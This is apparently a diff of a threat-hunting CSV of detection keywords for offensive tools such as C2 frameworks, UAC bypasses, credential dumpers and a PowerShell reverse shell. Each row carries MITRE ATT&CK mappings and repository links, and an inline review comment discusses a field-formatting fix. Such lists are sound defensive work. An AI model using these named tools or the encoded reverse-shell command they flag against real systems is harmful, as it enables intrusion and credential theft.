-"*C2.UserAgent*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*C2.UserAgent*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
 "*C2/C2Server.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
-"*C2_RPC_functions.py*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z"
+"*C2_RPC_functions.py*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
 "*c2_server*.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z"
 "*c2_server.resources*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z"
 "*C2_Server-main*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z"
-"*c2_service.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z"
-"*c204e44cffb51d95128971ec8b31e668e3b4f50ba3f4082c36ced76c2b30bc63*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*c2_service.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*c204e44cffb51d95128971ec8b31e668e3b4f50ba3f4082c36ced76c2b30bc63*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
 "*C2concealer -*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z"
 "*C2concealer-master*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z"
 "*'C2Default'*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
@@ -8216,27 +8363,27 @@ "*'c2server'*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","0","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*C2Server.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*C2Server.ps1*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. 
you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","C2","https://github.com/JoelGMSec/PSRansom","1","1","N/A","10","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z" -"*c2server_arm_musl*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*c2server_armv7*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*c2server_debug*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*c2server_linux*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*c2server_macos*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from 
VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*c2server_release*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*c2server_windows*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_arm_musl*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_armv7*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_debug*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and 
Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_linux*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_macos*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_release*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*c2server_windows*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" "*C2TaskMessage.*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*c2VydmVyMS5jaWEuZ292*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*C2WebSocketHandler.*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" -"*c4d57f02dd8276fb3df81442bda345d4c3004dfc2842b2140ac9e71b30fd743b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*c51beca480d6e6f88174698503c0856c56488a59101d259c068dccb0902b01ec*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*c4d57f02dd8276fb3df81442bda345d4c3004dfc2842b2140ac9e71b30fd743b*","offensive_tool_keyword","UACME","Defeating 
Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*c51beca480d6e6f88174698503c0856c56488a59101d259c068dccb0902b01ec*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*C526B877-6AFF-413C-BC03-1837FB63BC22*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*c708b83f-4167-4b4c-a1db-d2011ecb3200*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" -"*c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" "*C73A4893-A5D1-44C8-900C-7B8850BBD2EC*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*C7E4B529-6372-449A-9184-74E74E432FE8*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). 
To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" -"*C8482002-F594-4C28-9C46-960B036540A8*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" -"*c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*CA280845-1F10-4E65-9DE7-D9C6513BBD91*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" 
+"*C8482002-F594-4C28-9C46-960B036540A8*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" +"*c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*CA280845-1F10-4E65-9DE7-D9C6513BBD91*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBGAGkAbABlACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUwBoAGUAbABsADMAZQByAC4AcABzADEA*","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell 
spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","0","N/A","N/A","1","56","11","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*cache_activedirectory.py*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" "*cachedump.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
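Review bot: The seven REC2 rows rewritten in this hunk (`*c2server_arm_musl*` through `*c2server_windows*`) still carry a trailing space in `metadata_tool` (`"REC2 "`). Any exact-match lookup, join or group-by on the tool name will treat that as a different value from `REC2`. Since the rows are being re-emitted for the star and fork refresh anyway, write the field as `"REC2"`. Separately, `*c2server_debug*` and `*c2server_release*` look like fairly generic substrings, yet `metadata_comment` is `N/A`. If they have not been checked against benign build artefacts, a comment such as `risk of false positives` would tell rule consumers to scope them.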
@@ -8249,8 +8396,8 @@ "*CACTUSTORCH.vba*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.vbe*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 
- T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*CACTUSTORCH.vbs*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" -"*caffix*amass*","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1590 - T1591 - T1592 - T1593 - 
